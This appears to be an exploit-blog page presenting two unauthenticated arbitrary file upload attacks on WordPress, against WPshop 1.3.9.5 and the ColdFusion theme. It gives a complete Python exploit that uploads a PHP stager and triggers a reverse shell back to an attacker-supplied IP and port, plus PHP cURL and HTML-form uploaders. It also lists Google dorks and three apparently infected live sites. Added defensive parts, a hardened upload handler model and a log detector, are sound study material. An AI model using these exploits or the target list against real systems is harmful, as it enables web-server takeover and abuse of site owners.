
Friday, 04 December 2015

WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload


#-Title: WordPress WPshop eCommerce 1.3.9.5 Shell Upload
#-Author: g0blin
#-Lab : research[dot]g0blin[dot]co[dot]uk
#-Date: 2015-03-02
#-Link Download : wordpress. org/plugins/wpshop/
#-Google Dork: inurl:wp-content/themes/wpshop/
#-Tested on : Linux
#-Fixed in : 1.3.9.6
////////////////////////////////////////////////////////////////////////////////////////////

Information of Bug : 

CVSS Score : 6.4
CVSS Vector : CVSS v2 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope : remote
Authorization Required : None

When Vulnerable : blank (a plain request to includes/ajax.php returns an empty page instead of an error)

Description : 
The script 'includes/ajax.php' lets anonymous users trigger a number of plugin actions; the action name is passed in the 'elementCode' parameter. One of these actions, 'ajaxUpload', writes the uploaded file (the 'wpshop_file' multipart field in the PoC below) to a web-reachable path and returns its URL, without any authentication and without validating the file's name or type. An attacker can therefore upload a PHP file and execute it in the context of the web server.


Solution:

Update to version 1.3.9.6.
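The root cause described above is two missing controls: the ajaxUpload action is reachable by anyone, and the filename and contents are stored exactly as received. The following Python model is an added illustration, not the plugin's PHP and not g0blin's code; the Request fields, the extension allowlist, the upload directory and the result names are assumptions. It puts the vulnerable handler beside a hardened one and shows what each does with the PoC's test.php stager.

```python
import os
import re
import secrets
from dataclasses import dataclass

# What a shop's media uploader legitimately needs (assumed allowlist for this model).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}

# Leading bytes each allowed type must start with, so body and extension have to agree.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

# Names a PHP-enabled server may execute; rejected wherever they appear in the filename,
# because Apache mod_mime treats "shell.php.jpg" as PHP.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "htaccess"}

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


@dataclass
class Request:
    """Hypothetical view of one ajaxUpload call: who sent it and what they sent."""
    is_logged_in: bool
    can_upload_files: bool   # e.g. the WordPress 'upload_files' capability
    nonce_valid: bool        # CSRF token check, e.g. check_ajax_referer()
    filename: str            # client-supplied name of the multipart file field
    body: bytes


@dataclass
class Result:
    accepted: bool
    reason: str
    stored_path: str = ""


def vulnerable_ajax_upload(req, upload_dir="wp-content/uploads/wpshop"):
    """Model of the 1.3.9.5 behaviour: no caller check, client name kept verbatim."""
    return Result(True, "stored", os.path.join(upload_dir, req.filename))


def hardened_ajax_upload(req, upload_dir="wp-content/uploads/wpshop"):
    """The same action with the controls the advisory says were missing."""
    # 1. Authorization before anything else: anonymous callers get nothing,
    #    and a nonce stops a logged-in admin being driven through CSRF.
    if not (req.is_logged_in and req.can_upload_files):
        return Result(False, "unauthorized")
    if not req.nonce_valid:
        return Result(False, "bad_nonce")
    # 2. Drop any directory component (../ traversal, absolute paths) and control bytes.
    base = os.path.basename(req.filename.replace("\\", "/"))
    if not base or CONTROL_CHARS.search(base):
        return Result(False, "bad_filename")
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return Result(False, "no_extension")
    # 3. Extension allowlist; executable names are refused in any position.
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:]):
        return Result(False, "executable_extension")
    ext = parts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return Result(False, "extension_not_allowed")
    # 4. Content must look like the declared type: the PoC stager renamed to .jpg fails here.
    if not any(req.body.startswith(m) for m in MAGIC[ext]):
        return Result(False, "content_mismatch")
    # 5. Server-chosen random name: the attacker never learns a guessable URL and the
    #    original name never reaches the filesystem.
    stored = "%s.%s" % (secrets.token_hex(16), ext)
    return Result(True, "stored", os.path.join(upload_dir, stored))


if __name__ == "__main__":
    stager = b"<?php @assert(filter_input(0,woot,516)); ?>"   # the PoC's test.php
    anon = Request(False, False, False, "test.php", stager)
    print("vulnerable:", vulnerable_ajax_upload(anon))
    print("hardened:  ", hardened_ajax_upload(anon))
    print("hardened, admin, php:", hardened_ajax_upload(Request(True, True, True, "test.php", stager)))
```

The extension check is the load-bearing control: the magic-byte check only raises the bar (a JPEG header followed by PHP still passes it), so a file that ends in .jpg must also never be executed by the server, which the allowlist and the ban on executable extensions anywhere in the name guarantee.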

-- Proof Of Concept --

Requires : Python 2 with the `requests` module, plus the two files below (wpshop.py and back_python.php)
How to use :
python2 wpshop.py http://host/wordpress_baseurl/ <payload.php> <your-ip> <port>
- Example :
python2 wpshop.py http://web. com back_python.php 192.168.2.116 1337

Script wpshop.py : 
#!/usr/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150427.1
# Licence: WTFPL - wtfpl.net
import requests
import sys
__version__ = "20150427.1"

def banner():
    print """\x1b[1;32m
██╗ ██╗██████╗ ███████╗██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███╗ ██╗
██║ ██║██╔══██╗██╔════╝██║ ██║██╔═████╗██╔══██╗██║ ██║████╗ ██║
██║ █╗ ██║██████╔╝███████╗███████║██║██╔██║██████╔╝██║ █╗ ██║██╔██╗ ██║
██║███╗██║██╔═══╝ ╚════██║██╔══██║████╔╝██║██╔═══╝ ██║███╗██║██║╚██╗██║
╚███╔███╔╝██║ ███████║██║ ██║╚██████╔╝██║ ╚███╔███╔╝██║ ╚████║
╚══╝╚══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝
Exploit for WPShop Ecommerce, WPVDB-7830 Version: %s\x1b[0m""" %(__version__)

def php_encoder(php):
    # Read the PHP payload, strip its open/close tags and wrap it in
    # eval(base64_decode(...)) so it travels as one POST parameter to the stager.
    f = open(php, "r").read()
    f = f.replace("<?php", "")
    f = f.replace("?>", "")
    encoded = f.encode('base64')
    encoded = encoded.replace("\n", "")
    encoded = encoded.strip()
    code = "eval(base64_decode('%s'));" %(encoded)
    return code

def shell_upload(url):
    # Unauthenticated multipart POST to the ajaxUpload action; the response body
    # is the URL of the stored file.
    target_url = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
    try:
        print "\x1b[1;32m{+} Using target URL of: %s\x1b[0m" %(target_url)
        # Stager: assert() on a string evaluates it as PHP code (PHP < 8), and
        # filter_input(INPUT_POST=0, 'woot', FILTER_UNSAFE_RAW=516) pulls that
        # string out of the POST body. The unquoted constant 'woot' falls back
        # to the string "woot", with a notice that @ suppresses.
        r = requests.post(url=target_url, files={"wpshop_file":("test.php", "<?php @assert(filter_input(0,woot,516)); ?>")})
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
    if r.text:
        return r.text.strip()
    else:
        sys.exit("\x1b[1;31m{-} Something fucked up... Our shell was not uploaded :/\x1b[0m")


def spawn_backconnect(shell_url, payload, cb_host, cb_port):
    # back_python.php reads the callback host/port from these two cookies.
    cookies = {'host': cb_host, 'port': cb_port}
    data = {'woot': payload}
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'}
    try:
        print "\x1b[1;32m{*} Sending our payload...\x1b[0m"
        r = requests.post(url=shell_url, data=data, headers=headers, verify=False, cookies=cookies)
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
    if r.text:
        print r.text

def pop_shell(target, code, cb_host, cb_port):
    shell_url = shell_upload(url=target)
    print "\x1b[1;32m{+} Our shell is at: %s\x1b[0m" %(shell_url)
    try:
        print "\x1b[1;36m{*} Sending Backconnect to %s:%s...\x1b[0m" %(cb_host, cb_port)
        spawn_backconnect(shell_url=shell_url, payload=code, cb_host=cb_host, cb_port=cb_port)
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))

def main(args):
    banner()
    if len(args) != 5:
        sys.exit("use: %s http://host/wordpress_baseurl/ <payload.php> <cb_host> <cb_port>" %(args[0]))
    pop_shell(target=args[1], code=php_encoder(args[2]), cb_host=args[3], cb_port=args[4])

if __name__ == "__main__":
    main(args=sys.argv)


Script back_python.php : 

<?php
// Callback host and port arrive as cookies, set by spawn_backconnect() in wpshop.py.
$cbhost = $_COOKIE['host'];
$cbport = $_COOKIE['port'];
echo "{+} Using ".$cbhost.":".$cbport." as callback...\n{+} Dropping shell...\n";
// Base64-encoded Python reverse shell; the encoded blob is not reproduced on this page.
$shell =
"<base64-encoded python reverse shell omitted>";
$x = fopen("/tmp/x", "w+");
fwrite($x, base64_decode($shell));
fclose($x);
echo "{+} Shell dropped... Triggering...\n";
system("python /tmp/x ".$cbhost." ".$cbport);
die('{+} got shell?'); // payload should have rm'd itself
?>


Result Shell : Here !!

Saturday, 28 November 2015

WordPress theme ColdFusion Arbitrary File Upload Vulnerability


#-Title: WordPress theme ColdFusion Arbitrary File Upload Vulnerability
#-Author: Smail Max / Bet0
#-Date: 10/31/2013
#-Vendor : themeforest. net
#-Link Download : themeforest. net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748
#-Google Dork: inurl:wp-content/themes/ColdFusion
#-Tested on : Win7, Linux
#-Fixed in : unknown
////////////////////////////////////////////////////////////////////////////////////////////

Information of Bug : 

Bugtraq ID: 63523
Class: Input Validation Error
CVE: -
Remote: Yes
Local: No
Published: Nov 01 2013 12:00AM
Updated: Nov 01 2013 12:00AM
Credit: Bet0
When Vulnerable: {"status":"NOK", "ERR":"This file is incorect"}

Description : 
The ColdFusion Theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. 

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.


Solution:
Currently, we are not aware of any vendor-supplied patches.

-- Proof Of Concept --

With a PHP cURL script :

<?php
$uploadfile="3xploi7.php";
$ch = curl_init("http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
// The "@file" upload syntax only works on PHP < 5.5 (and is off by default from 5.6);
// newer PHP needs a CURLFile object for the same multipart upload.
$file = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata' => $file));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

With an HTML form (the endpoint takes no authentication, so the form can be hosted anywhere) :

<form
action="http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

If successful (with the form) :

Shell Path : Here

Site Demo (Infected) :
http://www.laughinXgcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.alias-phXoto.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.manueXl-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
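Both advisories on this page have the same shape: an unauthenticated upload endpoint, then a request to the dropped PHP file. A defender with nothing but web-server access logs can hunt for that chain. The script below is an added example and is not part of either advisory; the log lines are constructed, the storage paths of the dropped files are assumptions (neither advisory says where its endpoint writes, only that the WPshop response contains the file's URL), and the rule names are my own.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache "combined" log lines for illustration; not real traffic.
# The paths of the dropped files are assumptions: the advisories do not say where
# either endpoint stores uploads, only that the WPshop response contains the file's URL.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Dec/2015:10:00:01 +0000] "GET /shop/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Dec/2015:10:00:02 +0000] "POST /shop/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload HTTP/1.1" 200 71 "-" "python-requests/2.7.0"
203.0.113.7 - - [04/Dec/2015:10:00:03 +0000] "POST /shop/wp-content/uploads/wpshop/test.php HTTP/1.1" 200 98 "-" "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"
198.51.100.9 - - [28/Nov/2015:10:05:10 +0000] "POST /wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php HTTP/1.1" 200 44 "-" "curl/7.35.0"
198.51.100.9 - - [28/Nov/2015:10:05:12 +0000] "GET /wp-content/uploads/3xploi7.php HTTP/1.1" 200 12 "-" "curl/7.35.0"
192.0.2.44 - - [04/Dec/2015:10:07:00 +0000] "POST /shop/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxCart HTTP/1.1" 200 300 "http://shop.example/" "Mozilla/5.0"
192.0.2.44 - - [04/Dec/2015:10:07:01 +0000] "GET /shop/wp-content/uploads/2015/12/product.jpg HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

WPSHOP_AJAX = "/wp-content/plugins/wpshop/includes/ajax.php"
COLDFUSION_UPLOADIFY = "/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php"
# Anything executable being requested from the uploads tree: that is a dropped shell being used.
PHP_UNDER_UPLOADS = re.compile(r"/wp-content/uploads/.*\.(?:php\d?|phtml|phar)$", re.I)
UPLOAD_RULES = {"wpshop_ajaxupload_post", "coldfusion_uploadify_post"}


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Name the rule one parsed entry matches, or None when it looks benign."""
    url = urlsplit(entry["target"])
    query = parse_qs(url.query)
    # Only the ajaxUpload action is interesting; other elementCode values are normal shop traffic.
    if entry["method"] == "POST" and url.path.endswith(WPSHOP_AJAX) \
            and query.get("elementCode") == ["ajaxUpload"]:
        return "wpshop_ajaxupload_post"
    if entry["method"] == "POST" and url.path.endswith(COLDFUSION_UPLOADIFY):
        return "coldfusion_uploadify_post"
    if PHP_UNDER_UPLOADS.search(url.path):
        return "php_executed_under_uploads"
    return None


def chain_seen(rules):
    """True when an upload-endpoint hit is followed, in log order, by PHP served from uploads."""
    seen_upload = False
    for r in rules:
        if r in UPLOAD_RULES:
            seen_upload = True
        elif r == "php_executed_under_uploads" and seen_upload:
            return True
    return False


def scan(log_text):
    """Return (findings, suspect_ips): every matching line, and the sources showing the full chain."""
    findings = []
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        rule = classify(entry)
        if rule:
            findings.append({"ip": entry["ip"], "ts": entry["ts"], "rule": rule, "target": entry["target"]})
            by_ip[entry["ip"]].append(rule)
    suspects = sorted(ip for ip, rules in by_ip.items() if chain_seen(rules))
    return findings, suspects


if __name__ == "__main__":
    findings, suspects = scan(SAMPLE_LOG)
    for f in findings:
        print("%-28s %-15s %s" % (f["rule"], f["ip"], f["target"]))
    print("sources showing upload-then-execute chain:", suspects)
```

A single hit on either endpoint is worth a look on its own, since both are only ever legitimately called from the site's own admin pages; the chain check exists so that a noisy scanner that merely probes the endpoint ranks below a source that went on to run what it uploaded.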